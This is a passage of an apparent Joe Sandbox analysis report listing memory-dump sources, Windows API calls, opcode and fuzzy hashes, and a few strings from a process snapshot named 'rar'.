                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2244327787-0
                                                                                                                                                                                                                              • Opcode ID: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
                                                                                                                                                                                                                              • Instruction ID: 8b90823c10bf64a59ebc974be295f1b29833fb824dd4645b7852113336a5dc9c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F219035E8C94681EA60CB2AF40833A62B4BF89B94F205531EB99C76E5CF3DD8818741
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: AFUM$default.sfx
                                                                                                                                                                                                                              • API String ID: 0-2491287583
                                                                                                                                                                                                                              • Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                              • Instruction ID: 801ce4505cd3594f32c35cc0aa3b4417f52e4b9923a07f7da0fe8a095c8003eb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B481C126E0CA9280EB70DB1991593BD22B0BF69784F44C031EF8D876F6DF6DA585C790
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileHandleType
                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                              • API String ID: 3000768030-2766056989
                                                                                                                                                                                                                              • Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                              • Instruction ID: fc6bf0d7a6a2ca692df59d6db2f01e031e3e8dd2ab40efe6324bff5c3917f8e2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21218922E1876241EB688B2DD4901392655FB4A774F2C5375D76E477F8CE3CD481C305
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                                                                                                                                                                                              • String ID: CreateThread failed
                                                                                                                                                                                                                              • API String ID: 1217111108-3849766595
                                                                                                                                                                                                                              • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                              • Instruction ID: 6751663255197736d8a50cd4ece211c3ff2767b540d7b8f76193675932fa91ec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49114F31A08A4292EB09DF19E8442BE7370FF98784F544136DB9D86679DF7CE546C740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3094578987-0
                                                                                                                                                                                                                              • Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                              • Instruction ID: 86bccde3141c975d57445bf6e820a5b8b47bb0f6ab270ba694f704e39a79b676
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10F06D22A08A8682EA24DF29E5440BD6370FFCDBD8F040271DF9D46679CF2CD5498B00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleFileHandleModeType
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4141822043-0
                                                                                                                                                                                                                              • Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                              • Instruction ID: d13fdde27ca06155c1bbeb5ac15739f72fe1111ade15345ceeda123f962e4a13
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79E08C20E04A4242EA588B29A8691380261FF5DB80F502034DA0FCA370EE2C94858310
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                              • Instruction ID: 8c750fbe3597ee437eceada4f2ba66f8c3350c51c20e6d1d811a44c4d3d3b341
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAE01A20A08B5646EB4C6B28A8817792352BFAC741F045A38CE0E823A2CE3EA4098250
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CharEnvironmentExpandStrings
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4052775200-0
                                                                                                                                                                                                                              • Opcode ID: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
                                                                                                                                                                                                                              • Instruction ID: e1860d58c5b6f307c1d601193b8466717ef858110db6f96f0f80e1873889b53f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68E1D426A9868286EB30CF28E4591BE67B0FB59794F444131DB9D87AF9DF7CE481C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF6BBCC7EBE,00000000,00000000,00000000,00000000,00000007,00007FF6BBCC7C48), ref: 00007FF6BBCD1B8D
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF6BBCC7EBE,00000000,00000000,00000000,00000000,00000007,00007FF6BBCC7C48), ref: 00007FF6BBCD1BD7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                              • Instruction ID: 6414cde3780e3bf09682048fe3e497bfd21a08f9f3db79de99961f61c549e301
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F13124A3A5868546F730DF28E4093A936A0FB48B78F105334DB6C866E5DF7CD585C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 932687459-0
                                                                                                                                                                                                                              • Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                              • Instruction ID: 67644977c0d9c06b0a19f511c8c0f99975eb0b50d2453e55f9a6c1623ef681b6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7212163A18E8582EB11CF29D5511BC6370FB9CB88B18A331DF9D42666EF28E5E58300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: a42658d34a1fb92fbd8d718425b99dc084056a970e35fbbcb39c16e60e17b306
                                                                                                                                                                                                                              • Instruction ID: 1593a0f6320ffdf65c572e48227819ac0300a234337f4eb168f4866e81c3dfb3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a42658d34a1fb92fbd8d718425b99dc084056a970e35fbbcb39c16e60e17b306
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4119031909B8281EA04EB68A5193ADB2A4FF98790F244635EB9D877F6DF7CE051C314
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
